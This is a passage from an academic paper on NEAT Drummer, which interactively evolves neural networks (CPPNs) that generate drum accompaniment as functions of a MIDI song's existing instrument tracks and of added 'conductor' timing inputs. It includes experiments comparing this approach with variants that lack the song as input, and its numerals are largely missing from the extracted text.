the historical marking is a number assigned to each gene corresponding to its order of appearance over the course of evolution. the numbers are inherited during crossover unchanged, and allow neat to perform crossover without the need for expensive topological analysis. second, neat traditionally speciates the population based on topological similarity so that individuals compete primarily within their own niches instead of with the population at large, which protects topological innovations. the historical markings allow structures to be compared for this purpose. however, because the user performs selection in interactive evolution instead of the evo- lutionary algorithm itself, speciation is not applicable in neat drummer and therefore not utilized. note that in section , variants of regular non-interactive neat are compared to neat drummer, and these variants therefore do im- plement speciation. third, unlike other systems that evolve network topologies and weights (yao, ), neat begins with a population of simple networks with no hidden nodes. new structure is introduced incrementally as structural mutations occur, and only those structures survive that are found to be useful through fitness evalua- tions. this way, neat searches through a minimal number of weight dimensions and finds the appropriate complexity level for the problem. neat drummer lets the user evolve patterns of increasing complexity through this approach. finally, in neat drummer, neat evolves a kind of ann called a compo- sitional pattern producing network (cppn), which is designed to compactly represent patterns with regularities, such as pictures and songs (stanley, , ). what distinguishes cppns from anns is that in addition to traditional sigmoid functions, cppn hidden nodes can include several classes of functions, including periodic functions (like sine) for repetition and symmetric functions (like gaussian) for symmetry. an individual network can contain a heteroge- neous set of functions in its nodes, which are evolved along with the weights. to demonstrate the capabilities of such networks, stanley ( , ) showed how simple canonical functions can be composed to create an overall network figure : cppn inputs and outputs the user selects both a set of inputs from among the channels in the midi file and a set of outputs corresponding to specific drums. that produces patterns with complex regularities and symmetries. each com- ponent function creates a novel geometric coordinate frame within which other functions can reside. the idea in neat drummer is that this representation allows drum tracks with regular patterns to be discovered quickly and easily. the next section explains how cppns are evolved in neat drummer to produce rhythms. the neat drummer approach the main idea in neat drummer is that the temporal patterns of the instru- mental parts of a song can be inherited by the drums by making the drums a function of the other instruments. this section begins by explaining how cppns encode rhythm and then details how they are evolved interactively. . cppn rhythm generation neat drummer begins by generating an initial set of original drum tracks for a provided song. to initiate this first generation, the user must first specify the inputs and outputs of the cppn (figure ) through a graphical user interface (gui) provided by the program (figure ). the inputs are individual instrumental tracks from the chosen song and the outputs are a set of drums that together produce the entire drum accompani- ment. from the inputs the cppn derives its original patterns, which are therefore functions of the original song (i.e. the scaffold) and its structure. in other words, neat drummer generates a rhythm that is a function of these inputs. thus, it is important to choose instruments that play salient motifs in the song so that the drum pattern can be derived from the richest structures available. further texture can be achieved by inputting more than one midi channel, e.g. bass and guitar. thus the user selects any combination of channels representing individual instrumental parts from a midi file to be input into the cppn. in this way, figure : neat drummer screenshot neat drummer presents an iec interface where visual representations of drum patterns help the user to de- cide whether to listen to each candidate and then select their favorites. this approach, i.e. choosing inputs and outputs and selecting favorites, is designed to allow users to evolve compelling drum tracks without the need for musical expertise. neat drummer generates rhythms from any midi file. the user also chooses the percussion instruments that will play the rhythm. each such instrument is represented by a single output on the cppn. for ex- ample, one output may be a bass drum, one a snare, and the final a hi-hat. any number of drums, and hence any number of outputs, are permissible. to produce the initial patterns, a set of random initial cppns with a min- imal initial topology (following the neat approach) and the chosen inputs and outputs are generated. the number of inputs in these initial topologies corresponds to the number of instrument channels in the scaffold (e.g. guitar, bass, etc.) plus a bias node. the relationship between the initial topology and the original song is thus established through these inputs, which feed informa- tion from the scaffold directly into the network. the number of outputs equals the number of drums in the drum ensemble. the initial minimal topology has random connectivity yet always contains exactly one hidden node. this single hidden node ensures that initial patterns sound more interesting than percep- trons, but are still relatively simple. note that the internal topology is thus unrelated to the scaffold except insofar as it is affected by the number of inputs. thus the apparent “knowledge” of the provided song in the pattern output by the network is entirely a result of computing a function of the scaffold. neat drummer then inputs the selected channels into the cppn over the course of the song in sequential order and records the consequent outputs, which represent drums being struck. specifically, from time t = to t = l, where l is the length of the song, the inputs are provided and outputs of the cppn are sampled at discrete subintervals (i.e. ticks) up to l. individual notes input into the cppn from selected midi channels are rep- resented over time as spikes that begin high and decrease (i.e. decay) linearly (figure ). the period of decay is equivalent to the duration of the note. that way, the cppn “hears” the timing information from the supplied channels while in effect ignoring pitch, which is unnecessary to appreciate rhythm. by allowing the spikes to decay over their duration, each note becomes a kind of temporal coordinate frame. that is, the cppn in effect knows at any time where it is within the duration of a note by observing the stage of its decay. that in- formation allows it to create drum patterns that vary over the course of each note. interestingly, it is potentially useful also to input temporal patterns that are not part of the song itself. such patterns can provide additional structure to the drums by situating them within coordinate frames that describe how the user wants the song to vary at a meta-level. for example, inputting a simple linear function of time that indicates the position-in-song at each tick (figure a) in addition to the instrument channels means that the output is a function of both the song itself and the position-in-song. that way, the cppn can produce a drum track that shifts gradually from one motif to another over the course of the song. similarly, by inputting position-in-measure (figure b) or position-in-beat (figure c), the user can bias the output towards progressions across each mea- sure or beat. figure : channel input encoding. regardless of the instrument, each note in a sequence in any channel input to the cppn is encoded as a spike that decays over the duration of note. the pattern depicted in this figure shows how quarter notes decay faster than half notes, thereby conveying timing information to the cppn, which samples this pattern at discrete ticks. the variable-intensity row of boxes under the spikes depicts the intensity of the spike sampled at discrete time steps (i.e. four per quarter note). the intensity at each timestep is represented by the darkness in its respective column, which indicates how the input channel “sounds” to the cppn at that moment. in this paper, these additional inputs are called conductors to make a metaphor with the silent patterns expressed to an orchestra by its conductor. additional inputs that represent desired hidden contours beyond the pattern of the in- struments themselves give the user an unprecedented level of control over the nuances of the global output pattern. in fact, any arbitrary sequence can be input as a conductor, which in effect simply means a set of note spikes that are never actually heard. thus the pattern in figure , while introduced as an instrumental pattern, could also be a complex conductor pattern that suggests a particular underlying motif that the drums should elaborate. note that in neat drummer, by convention, conductor inputs that represent time are spikes that start low and attack, which conveys the idea of a timing signal, as opposed to notes from scaffolding inputs, which are decaying spikes. unlike cppn inputs, the level of each cppn output is interpreted as the volume (i.e. strength) of each drum strike. that way, neat drummer can produce highly nuanced effects through varying softness. two consecutive drum strikes one tick after another are interpreted as two separate drum strikes (as opposed to one long strike). to produce a pause between strikes, the cppn must output an inaudible value for some number of intervening ticks. because the cppn has one output for each drum, the end result of activating the network over t ticks is a drum sequence for each drum in the ensemble. an interesting aspect of this representation is that it does not make explicit use of recurrent connections. while recurrent networks are often noted for their ability to encode temporal patterns (dolson, ; todd and latham, ; (a) position-in-song (b) position-in-measure (c) position-in-beat figure : potential neat drummer conductor inputs. each figure depicts four measures of a conductor, which is a temporal coordinate frame optionally provided by the user to provide additional structure to the song. the simplest conductor (a) represents the current position in the song, suggesting a smooth transition across the entire song. position-in-measure (b) allows the cppn to know at every moment where it is within the current measure, which allows it to improvise patterns within measures and “understand” the measure structure of the song. similarly, the time within each four-tick beat can be input as well (c). conductors offer the user a subtle yet powerful means to influence the overall structure of the rhythm without the need for note-by-note specification. chen and miikkulainen, ), it is easier to simply express music as a function of an existing temporal pattern (i.e. the melody and harmony) and thereby affix one pattern to another without needing to learn the temporal synchronization itself. thus, while recurrence is well suited to temporal problems in which the inputs are not known a priori, because music is deterministic, recurrence is unnecessary; because the inputs are always the same, the outputs can simply be expressed as a function of the inputs. thus the cppn can potentially represent that function without recurrence. neat drummer generates each of the individuals in the initial population with the same set of inputs and outputs. however, the initial cppn weights and activation functions for each member of the population are decided randomly. in particular, every input is connected to every output with a randomized weight within [ − , ]. the activation function of each node is assigned randomly from among the following options: sigmoid, binary threshold, gaussian, linear, mul- tiplication, and sine. to encourage interesting patterns in the initial generation, a single hidden node with a random activation function is also connected into the network by splitting a randomly chosen connection. each song is divided into ticks (four per beat). at each tick, the vector of note spike values at that discrete moment of time for all the instruments is input. the cppn is fully ac- tivated and the value of each drum output is recorded so that all the generated drum tracks can be visualized or played instantaneously to facilitate interactive evolution, as explained in the next section. . drum pattern interactive evolution as shown in figure , neat drummer displays the set of candidate patterns visually after they are generated. it is important to note that unlike in many evolutionary experiments, pat- terns in the initial generation already sound appropriate. this initial high qual- ity underscores the contribution of the scaffold (i.e. the existing tracks) to the structure of the generated patterns. thus many appealing patterns already exist in the first generation, demonstrating how quickly appropriate accompaniment can be generated as a function of the source channels. in this way, a major contribution of this research is in showing how rich context can be leveraged by a connectionist system to successfully constrain output to appropriate patterns. the aim of evolution is thus to elaborate on such patterns. the user can choose to listen to any displayed pattern. when listening, the user can listen to the drum track alone or the drum track with its associated song. the visual presentation allows the user to quickly identify unappealing patterns without wasting time listening to them (e.g. wherein the bass is hit over and over again without pause). then either the user rates the individual patterns from which neat drum- mer chooses parents or the user selects a single parent of the next generation. further rounds of selecting and breeding continue until the user is satisfied. in this way, drum tracks evolve interactively. because of complexification in neat, they can become increasingly elaborate as evolution progresses. to encourage rapid elaboration over generations, the probability of adding a connection or node in neat was %. while this high probability would be deleterious in typical neat experiments (stanley and miikkulainen, , ), because drum tracks tend to follow song structure, this domain supports adding structure quickly. the mutation power, i.e. the maximum magnitude of weight change, was . and the probability of mutating the weight of an individual connection was %. finally, it is also important to note that in principle, the idea of representing musical structure in a connectionist system through scaffolding and conductors could be combined with a different evolutionary algorithm, or even a different training mechanism. thus while neat is a robust algorithm from which to demonstrate the power of scaffolding, the benefit of the scaffolding approach is likely compatible with other connectionist training approaches as well. . musical instrument digital interface neat drummer reads its input channels from musical instrument digital in- terface (midi) files. standard midi format (smf) is the most common midi filetype. smf format includes any number of tracks, each of which contains a sequence of instrumental events that occur in up to channels. each channel contains events that tell a particular instrument when and how loudly to play. according to the specification, most of the instrument sounds can occur in any of the channels with the exception of percussion, for which channel is reserved. neat drummer can input any combination of the channels into the cppn. that is, given a midi song, neat drummer generates a drum pattern as a function of any subset of the preexisting bass, guitar, vocals, etc. the resulting drum patterns are all explicitly functions of the inputs, so if part of a midi is input to the ann, the percussion follows the structure of that part. in this way, neat drummer can generate percussion for midi songs based on any subset of the preexisting instrument parts. experimental design this paper includes two sets of experiments. the first set focuses on the ca- pability of the scaffolding approach to generate drum tracks. the second set compares several other approaches with the scaffolding approach, both interac- tive and supervised, to provide an objective validation of the methodology. also, because music appreciation is largely subjective and auditory, the re- sults of neat drummer should be judged in part on that basis. therefore, midi files for every experiment reported in this paper are available online at http://eplex.cs.ucf.edu/neatmusic/. we invite readers to listen to the recordings and judge the natural quality of the percussion tracks discussed in sections and . . testing scaffolding the first set of experiments aim to determine whether drum tracks generated for particular songs are appropriate and nontrivial. the hope is that they respect the structure and transitions of the song yet do not mimic its instruments superficially. such sophisticated correspondence can confirm the capacity of functional relationships to generate plausible, human-like accompaniment. specifically, the first two experiments in this set investigate what happens when salient instrument channels are input alone to the cppn, which generates drum tracks for the folk songs johnny cope and oh! susanna. a follow-on experiment explores the consequences of inputting both instrument channels and conductors for the folk song oh! dem golden slippers. the question is whether the conductors add a dimension of variation that is seamlessly combined with the structure of the original song in the resultant drum track. a complex conductor is then input by itself into a cppn to isolate its effects and easily discern the functional relationship between the conductor and its outputs. . comparisons the second set of experiments are designed to scrutinize the power of scaffolding via input from the original song by attempting to achieve comparable output drum tracks without providing the original song as input. the aim is to illustrate the contribution of such scaffolding by investigating how other approaches fare without it. to control specifically for the contribution of the scaffold, each such attempt is still a variant of neat. that way, differences in performance are attributable to representation and scaffolding. in this spirit, first, ten -generation attempts are made to interactively evolve accompanying drums to johnny cope with neat without the drum channels from the song input into the network. instead, in the first five at- tempts, the network is recurrent and inputs only a bias. these attempts com- pare the capabilities of a recurrent network without any scaffolding to those of the scaffolded networks. in the last five attempts, the network is feedforward and provided only position-in-song as input. typical best results are presented. second, three target-based experiments form a more objective comparison. in these target-based runs, the aim is to reproduce a specific drum track that was previously evolved with neat drummer (i.e. with the scaffold provided) as an accompaniment to johnny cope. this drum track is set as the target for the target-based experiments, which do not have access to the scaffold. target-based runs rely on the same neat algorithm as neat drummer; however, the computer performs selection instead of a human user. selection is performed as in regular neat, wherein each individual in the population is assigned a fitness based on the sum-squared error between the target pattern and the attempted output: f = √∑t=l t= m − ∑t=nt= (xt − yt) lm , ( ) where m is the maximum possible error at any tick t, l is the number of ticks, xt is the target note value at tick t, and yt is the output value of the network at tick t. note that if there are multiple output tracks, this expression is applied to each and the fitness is the average. this fitness function is designed to approach . the better the output matches the target. the main question is how hard it will be for neat to evolve the very same rhythm that it evolved with the scaffold. three alternative representations are tested in this way: • recurrent neural networks with only a bias input, • feedforward networks with only a position-in-song conductor input, and • feedforward networks with both a position-in-song conductor and a position- in-measure conductor input. in these target-based experiments, neat is run with typical successful parameter settings for regular non-interactive evolution (stanley and miikku- lainen, , ). in particular, the population size was and probability of adding a connection or node in neat was % and %, respectively. the mutation power, i.e. the maximum magnitude of weight change, was . and the probability of mutating an individual connection was %. the compatibil- ity coefficients for determining to which species individuals belong (stanley and miikkulainen, ) were c = . , c = . , and c = . . the compatibility threshold ct was adjusted dynamically in increments of . to maintain a stable equilibrium of eight species. if it turns out that any of these variants can evolve the target drum track, it will show that the scaffold is not necessary to provide a context. on the other hand, if none of the representation can evolve the target, it shows the critical contribution of the scaffold. in summary, experimental results are divided into two parts: first, the power of scaffolding is tested through interactive evolution; second, scaffolding is compared to several variants of neat drummer without scaffolding. the next section details the results of evolving interactively with the scaffold. scaffolding results while neat drummer can theoretically input a drum channel from a midi file and thereby generate variations of the percussion, this section focuses on drum tracks generated from inputting non-percussion instruments, like guitars and bass. thus the midi songs input in this section do not include drums in their original form. results in this section are reported through figures that are designed to demonstrate the relationship between the cppn inputs and outputs as the song progresses over time. in the figures that follow, the inputs are arranged in rows at the bottom of each depiction and the outputs are the rows above. time moves from left to right and each discrete column represents a tick of the clock. no instrument can play at a rate faster than the clock ticks. there are four ticks per beat in all songs tested. a slightly thicker dividing line between columns denotes a measure break. while all drum tracks include bass, snare, and hi-hat outputs, the number and types of drum outputs is unlimited in principle as long as the right sounds are available. recall that inputs are spikes; in the figures, their decays are depicted as decreasing darkness. in contrast, outputs represent volumes, wherein darker shading indicates higher volume. the main difference between inputs and out- puts is that a single note in the input may straddle several columns during its decay. outputs on the other hand are played as separate notes for every solid column. for an output drum to last for more than a single tick before the next drum attack, it must be followed by white (empty) columns. . inputting instrument channels alone figure shows individuals from generations one and generated for the folk song johnny cope. the relationship between the the bass, hi-hat, and snare and the three input channels is complex because each drum is related to all three inputs. note however that the instrumental patterns in measures three and four are highly related though not identical. slight differences exist between the piano pattern in measure three and measure four; this difference is reflected in the snare in both generations one and , which both slightly differ between the early parts of measures three and four. thus, the drum pattern’s subtle variation is correlated to the music because of their coupling, which evokes a subjective sense of appropriate style. at measure , the song changes sharply by eliminating the piano part. consequently, the cppn outputs also diverge from their previous consistent motifs. this strongly coupled divergence that is carried both in the tune and in the drums creates a sense of purposeful coordination, again yielding a natural, sophisticated feel. in this way, the functional relationship represented by the cppn causes the drums to follow the contours of the music seamlessly. generation , which evolved additional connections and six additional nodes, reacts particularly strongly to the elimination of the piano by significantly altering its overall pattern. in generation one, the shift is less dramatic, showing how the user interactively pushed evolution towards a sharper transition over those ten generations. generation also elaborates on the snare, making it harder-hitting in the later measures than in earlier ones. results from generation of oh! susanna are shown in figure . neat drummer produces similarly natural and style-appropriate rhythms for this song as well, suggesting its generality. because style is inherent in the original song’s channels, it transfers seamlessly to the drum track without any need for explicit stylistic rules. the result is an entertaining sound that could be attached to the original instrumental tracks without raising suspicion. it is interesting to listen to the songs with their generated drum tracks, which makes it possible to judge their subjective quality (a critical aspect of figure : johnny cope results. results are depicted from two different generations at two different parts of the song. the inputs from the original song, which are always the same, are shown at bottom. note the relationship between the inputs and the outputs, and between the first generation and the eleventh, which elaborates on the former. the motif in measures three and four is typical of the first part of the song until measure , when it switches to a different motif in both generations. thus, the figure gives a sense of the two predominant drum riffs exhibited in both generations. the main conclusion is that the output is a function of the input that inherits its underlying style and character. (these tracks are available at http://eplex.cs.ucf.edu/neatmusic/) figure : oh! susanna outputs. this pattern from measures three through six of oh! susanna is from generation of evolution. the network evolved hidden nodes and connections. near the end of measure four is a particu- larly improvisational riff in the snare that transitions to measure five. this riff is caused by variation in the piano and other inputs at the same time. as with johnny cope, the drum pattern sounds natural and styled correctly for this up- beat song. (this track is available at http://eplex.cs.ucf.edu/neatmusic/) musical appreciation). in the authors’ experience (which the reader can also judge), the generated tracks sound natural and lack the usual “mechanical” quality of computer-generated music. rather than repeating stock patterns, core motifs subtly vary and are interspersed with occasional unique flourishes. the personality of these variations is a byproduct of the personality that is implicit in the song itself, simply functionally transformed into a different local motif. this result further demonstrates that it is possible to inherit the natural character of one pattern by deriving another from it. of course, the evolved song also in part reflects the tastes of the human user. . inputting instrument channels and conductors figure highlights the effect of a conductor input on drum tracks produced for the song oh! dem golden slippers, which has a very similar beginning and end; all the measures in these parts are similar. thus the question is whether a conductor can introduce a sense of progression into the drums even though the song itself undergoes little discernable progression between the start and finish. figure (a) shows example drum output for this song without any additional conductor. thus, with only the song’s channels as inputs, the resultant drum pattern is also highly repetitive; the pattern in measures two and three is largely preserved much later in measures and (figure a). yet when a position-in- song conductor (figure a) is added as an input, the difference in drum patterns between measures two and three and measures and is dramatic, show- ing the powerful effect of the simple conductor (figure b). nevertheless, even (a) without conductor (b) with position-in-song conductor (c) with position-in-song and position-in-measure conductors figure : oh! dem golden slippers with and without conductors output drum patterns are shown for the song in one case when no conductor is input (a) and in the other where a position-in-song conductor is input (b, shown at bottom). the difference in resultant drum patterns shows that the conductor imposes a temporal progression on the drum track that does not derive from the structure of the song itself, demonstrating the power of conductors to subtly shape the structure of music. finally, when conductors indicating both position- in-song and position-in-measure are input simultaneously (c), progression is enhanced both throughout the song and within each measure. (these tracks is available at http://eplex.cs.ucf.edu/neatmusic/) figure : complex conductor. the conductor, which follows the pattern quarter quarter half, is shown at bottom. two three-part drum tracks that are functions this conductor are shown above it. while both drum tracks are dif- ferent, they are also both constrained by the underlying motif of the conductor. (these tracks are available at http://eplex.cs.ucf.edu/neatmusic/) though the drum pattern exhibits a sharply different motif at these two similar parts of the song, it sounds appropriate and sophisticated in both parts because it is a function of both the conductor and the instrument channels. thus it is a seamless variation on both influences simultaneously. it is also possible to combine multiple conductors to affect the structure of the output in more than one way. figure (c) shows the impact of inputting both the time in the song (figure a) and the time in the measure (figure b) together. the result is that not only do the later drum patterns differ from the earlier ones, but the interior of each measure varies in part independently of the instrumental scaffold. this effect is subtle because there are five instrumental tracks already influencing the pattern in each measure. however, closely comparing the drum measure patterns in (c) to (a) and (b) does reveal a discernable difference. finally, figure isolates the effect of a single complex conductor. the aim is to show explicitly how the output of the cppn is influenced by the incoming conductor, which expresses the same quarter quarter half pattern as in figure . thus, the outputs of two cppns that both take the same conductor are displayed for comparison. the main result is that the patterns of the two three- part tracks are both closely tied to the pattern of the conductor, wherein two short events are always followed by a long one. yet, within that framework, the patterns nevertheless differ significantly, illustrating the idea that a conductor is an implicit guide above which the pattern is realized, even if there is no explicit song at all. the next section exhibits the evolved cppns that produce the drum tracks in this section. . evolved cppns figure shows the cppns that were evolved for each of the evolved drum tracks in sections . and . . these networks range in complexity from to hidden nodes. interestingly, the subjective quality of the accompaniment does not seem to correlate to the complexity of the network. this perception makes sense because the functional relationship to the original instrument channels guarantees a tight coordination between drums and instruments. thus creating a plausible coordination does not require significant complexity. furthermore, if the underlying instrument channels themselves embody complex motifs and progressions, then the drums inherit the same complexity even if the cppn that relates them is not itself complex. what cppn complexity affords, rather, is a more complex relationship that is realized through more elaborate covariation. this subjective effect is subtle yet perceptible, suggesting that more sophisticated compositions may suggest to the human ear the complexity of the function relating their parts. yet the most important conclusion is that complexity is not essential to the cppn that relates one part to another because the complexity need only exist originally in the preexisting parts. to a large extent, that original complexity is transferred through the cppn to any affiliated drum pattern. the next section presents the results from the comparative experiments. comparison results while the results in section establish the quality of the tracks produced through scaffolding and the power of conductors to shape the output pattern, the question remains what is lost if the scaffold is not provided, as in prior au- tomated music generation techniques. can similar accompaniment be produced without a scaffold? this section validates the role of the scaffold by answering this question. typical results reported in this section can be heard at http://eplex.cs.ucf.edu/neatmusic/. . interactive evolution without scaffolding as described in section . , in the first set of comparisons, recurrent anns with only a bias input and feedforward anns with position-in-song as input were evolved interactively with no other inputs to accompany johnny cope. five -generation runs of both configurations were completed. figure shows typical best results from these runs. the best results from each set reveal a distinct difference between feedforward functions of position-in- song and evolved recurrent networks. the feedforward patterns never develop beyond monotonous unbroken gradients that gradually vary from loud to soft, and sometimes back again (figure a). these gradients often span the length of the song, or a large extent of it, and do not respect the measure structure. thus, overall, position-in-song alone is not enough to allow interactive evolution to (a) johnny cope gen. (b) johnny cope gen. (c) oh! susanna (d) oh! dem golden without conductors (e) oh! dem golden with the time conduc- tor (f) oh! dem golden with measure and time (g) quarter quarter half conductor (h) quarter quarter half conductor figure : cppn drum track generators. the evolved cppns that pro- duce every drum track shown in sections . and . are depicted. while the complexities vary, the quality of the output is similar because each produces a function of a preexisting song, thereby inheriting its qualities. activation func- tions are denoted by s for sigmoid, m for multiplication, g for gaussian, and l for linear. (a) typical best feedforward (b) typical best recurrent figure : typical best results from interactive evolution without scaffolding. best results from both types of representations tested are de- picted. the feedforward network only inputs position-in-song and produces unremarkable gradient patterns that do not follow the structure of music nor the johnny cope song. the recurrent network produces repeating motifs, but they are not synchronized with the measure and they do not vary with the song. in this way, removing the scaffold removes a major advantage of neat drummer. compete with evolving networks with a better scaffold. this result makes sense because the only input is the position in the song, so the only way to develop a significant number of changes is to add many hidden nodes, which would take far longer than generations. also, because cppns have no knowledge of when measures begin or end, the changes that do occur are difficult to evolve to align with the measure structure. in contrast, patterns interactively evolved with recurrent networks do display more complexity and more frequent changes over time (figure b). because feedback can lead to complex oscillations without the need for many hidden nodes, recurrent networks are better suited to producing complex variation early in evolution. however, the drum patterns are difficult to evolve to align with the contours of the music itself because the recurrent network is unaware of the music without the scaffold. furthermore, these networks suffer from the same problem with measure structure as the feedforward networks: even though some motifs repeat, they repeat at haphazard times relative to each measure, producing a disorganized aesthetic. for example, the bass drum in figure (b) is hit several times at the start of the first measure, but by the fourth measure, this motif has moved to the middle of the measure. the overall result is that while the recurrent networks produce more com- plexity, the patterns evolved by both networks are not synchronized with johnny cope and therefore sound disjointed, highlighting the critical role of the scaffold in tethering the accompaniment to the song itself. . targeted evolution without scaffolding in this experiment, the same two types of networks as in the previous section, i.e. one recurrent and one feedforward with position-in-song input, were evolved to match a target (figure c), which is a rhythm for johnny cope output by neat drummer with the scaffold in the th generation. clearly, the scaffold provides an advantage, but the question addressed by this experiment is how hard it is without the scaffold to approximate the same output even when the precise target rhythm is known a priori. because it is also known that the target rhythm took exactly generations to evolve when the scaffold was provided, the number of generations it takes these variant networks to produce the same output can be compared. each variant attempted to match the target in separate runs. figure shows typical best results from these runs after , neat gen- erations with a population size of . it turns out that the feedforward network suffered similar problems breaking away from simple gradients as in interactive evolution. while such a network theoretically could approximate the target pat- tern, it always became trapped on a local optimum because it is easy to reach a fairly high fitness simply by approximating the general loudness of drums over large contiguous periods of time. in other words, instead of attempting to dis- cover every individual beat, it discovers their average energy and paints that energy level across large swaths of time. thus this type of network is demon- strably ill-suited to producing such temporal patterns, either through interactive evolution or target-based evolution. however, interestingly, unlike in the -generation interactive experiment, after generations the recurrent network typically produces a repeating pattern that does synchronize with the measure structure. thus one conclusion is that recurrent networks can learn musical structure given sufficient time. however, unlike the target pattern, which displays distinct variations (e.g. in the latter half of figure c), the pattern produced by the best recurrent networks tend to repeat the same measure pattern throughout the song after the first generation (figure b). also, this repeating motif is only vaguely reminiscent of the target, which is likely because the recurrent network has trouble producing the subtle repetition with variation that the target inherited from its scaffold when it was evolved. because the feedforward results were disappointing, a third set of runs was attempted with a feedforward network that receives both position-in-song (a) typical feedforward champion (b) typical recurrent champion (c) target pattern figure : typical best results from target-based evolution without scaffolding. feedforward (a) and recurrent (b) results are depicted and the target pattern is shown in (c). the aim was to match the target. as this figure shows, neither variant successfully matched the target (which was evolved in neat drummer in generations) after , generations, although the recurrent variant evolved more complex patterns. this result confirms again the importance of the scaffold. figure : typical result from target-based evolution with position- in-song and position-in-measure inputs. the improvement in pattern complexity, and the adherence to measure structure, are apparent in comparison to figure a. by providing position-in-measure as input, evolution can easily produce patterns that follow the timing of measures, demonstrating the power of conductor inputs. however, without the scaffolding inputs from johnny cope, the drum pattern still does not match the target despite its regular structure. and position-in-measure conductors as input. the idea is to relieve the network of the need to discover the measure structure of music on its own, exploiting the power of conductors. in fact, as figure shows, providing position-in- measure typically dramatically improves the complexity of the output and allows it to break out of the local optima that trap such networks without position-in- measure. indeed, the feedforward output resembles the output of the recurrent network and respects measure structure, demonstrating the contribution of the additional conductor. yet because even such conductors do not contain the same song-specific information as the scaffold, like the recurrent network, the output pattern is only marginally reminiscent of the actual target pattern, and is also more repetitive. thus, after , generations, none of the variant networks are able to suc- cessfully match a target pattern that was discovered in only generations. fig- ure summarizes this result by depicting fitness over time in the three variants, each averaged over runs. whereas a fitness of . denotes a perfect match, none of the variants reach a fitness of even . . interestingly, despite the appar- ent aesthetic inferiority of the feedforward network with only position-in-song, on average its fitness approaches that of the other two variants, demonstrating why local optima characterized by smooth volume gradients attract it. although their final fitness levels are not far apart, the differences between some of the variants are significant. in particular, recurrent networks pro- duce significantly higher fitness than position-in-song alone throughout the run (p < . ), and feedforward with the position-in-measure input outperforms feedforward without it (p < . ). however, interestingly, by the end of each run, recurrent networks on average are not significantly better than feedfor- figure : fitness over time of the three variants in target-based evolution. the increase in fitness over , generations of evolving the three variant representations is shown, averaged over runs for each. a perfect fitness of . would mean the target is matched perfectly. none of the variants exceed . fitness because the search is too unconstrained without the scaffold. ward with position-in-measure, showing that feedforward networks can match the performance of recurrent networks on this task when provided information on the structure of music. however, most significantly, none of the variants can produce a pattern close to the target within , generations. the main conclusion from both interactive and target-based comparisons is thus that the scaffold provides critical infrastructure. in effect, it constrains the search to patterns that relate to the original song. if accompaniment is to be evolved for an existing song, inputs from that song should be provided as a scaffold. without such context, the accompaniment becomes decoupled from the song regardless of the representation. a further result is that conductors make it easier to discover patterns that respect musical structure. while the recurrent network does eventually discover a measure-synchronized motif in the target-based runs, it takes hundreds of gen- erations to achieve such synchrony. on the other hand, when time-in-measure is provided as a conductor, measure structure is respected from the start. overall, this set of experiments confirms the contribution of the scaffold and suggests that it should be a standard facet of any network-based attempt to generate musical accompaniment. discussion while the sheer size of a composition containing multiple interrelated tracks suggests its complexity, the results with neat drummer show that by encoding some parts as functions of others, much of the apparent complexity is removed. while each drum track contains hundreds of drum strikes over several minutes, the networks that represent them contain on average only connections. the most salient feature of drum tracks generated in this way is that they sound natural, hinting that the functional relationship may reflect a realistic aspect of human musical creativity. . implications of scaffolding the idea of scaffolding, i.e. deriving several parts from a preexisting pattern, means that the most profound effort in musical creativity can be largely con- centrated on a relatively small part of the overall composition, which can then provide a scaffold for other parts. the interrelationships among the different in- struments of a song can be expressed as functions of one or more scaffold tracks, which is the approach taken in this paper. while effective, it is interesting that the direction of the relationship could also go the other way: melody and har- mony can by expressed as a function of rhythm. in fact, harmony can also be a function of melody and vice versa. thus there is no apparent essential starting point, though some may be more natural than others depending on the context. nevertheless, it is clear that something must form the scaffold from which all other accompaniment is derived. thus, as long as some seed is introduced, the accompaniment can follow smoothly. the main contribution of this paper is thus to advance automated music gen- eration by introducing an effective method for representing some parts of a song with respect to others in a connectionist framework. this approach significantly simplifies the problem of constraining accompaniment appropriately. neverthe- less, of course, different styles of accompaniment may be more or less difficult to discover, even with the scaffold. for example, can convincing jazz walking bass be generated even in the context of other jazz instrumental tracks? cer- tainly it is possible that the interactive evolution process can discover a function that expresses a particular style, yet the likelihood of such a discovery depends on to what extent the style is already embodied by the existing scaffold. the extent to which the scaffold contains essential stylistic cues, combined with the complexity of the function that would create the right style in the absence of such cues, determines the difficulty of the discovery. thus this work does not diminish the considerable human effort required to acquire specialized styles of accompaniment. another intriguing possibility is that specific conductors can be developed that constrain output to a desired style. thus, while discovering a style based on the scaffold alone may be difficult in some cases, providing both the scaffold and carefully chosen conductors can potentially simplify the search, just as conductors in this paper convey a priori measure and beat structure. interestingly, once a cppn is found that yields a particular accompaniment style, it can potentially be reused with other tracks. thus, once discovered, stylistic accompaniment may be transferable, which is an important topic for future research. overall, then, while some styles of accompaniment are probably harder to discover than others, the scaffold reduces the space that must be searched. nevertheless, although automated music generation may benefit from this principle, it still does not solve the fundamental problem of generating the scaffold itself. what kind of process can create the initial pattern? interestingly, it is possible that even an individual instrumental part can be generated from an even more abstract underlying scaffold, i.e. one that is never actually heard, like the conductors in this paper. these abstract patterns represent musical structures below the level of the explicit notes and pauses. rather, they are the shape of the fabric upon which such notes are woven. an interesting hypothesis is that human composers and songwriters construct at a cognitive level such hidden “conductors” before the salient musical pattern emerges as notes and rhythms. it may be difficult to discern, but several simple underlying functional motifs that cannot be expressed in musical notation may underlie apparently richly textured musical masterpieces. perhaps this hidden factor plays a role in our appreciation of music; when the many threads of a symphony stand out in their synchronized majesty, perhaps the brain is appreciating the simple hidden scaffold that unifies them in purpose. another complementary possibility is that even a long serial progression of notes is actually a series of motifs that are functions of each other. this view suggests that a scaffold or conductor underlying a long melody may itself be short and compact. these considerations lead to the philosophical question of how little is necessary to encode a “human essence” that functionally-related parts can inherit. perhaps only a very simple and short hidden function is all that is essential to the subsequent unfolding of a symphony. the size of the smallest necessary seed is practically important because the smaller it is, the easier it will be in the future to create entire compositions automatically. for example, if an entire complicated melody can be generated from a simple initial function, and the rhythm and harmony can be generated from the melody, then a future system might require a human to merely suggest the barest motif, such as a gradual attack followed by several step-wise decays, and from that point elaborate an entire composition through scaffolding. another important ingredient of neat drummer that is not automated is the user’s input. the product of a neat drummer session thus in part reflects the creativity of the user, and not just the search algorithm. it is an interesting question whether the user can be entirely eliminated, allowing the computer to compose completely on its own. however, while neat drummer does not eliminate the need for human input, what it does eliminate is the need for human expertise by shifting the creative focus from composition to opinion (i.e. what sounds the best). in this way, a significant obstacle to widespread, high-quality musical creativity is removed. thus the promise of this work is that it opens a promising new avenue to computer-generated music that raises interesting questions about how music is encoded and generated by humans. . the role of recurrence in connectionist music the experiments comparing 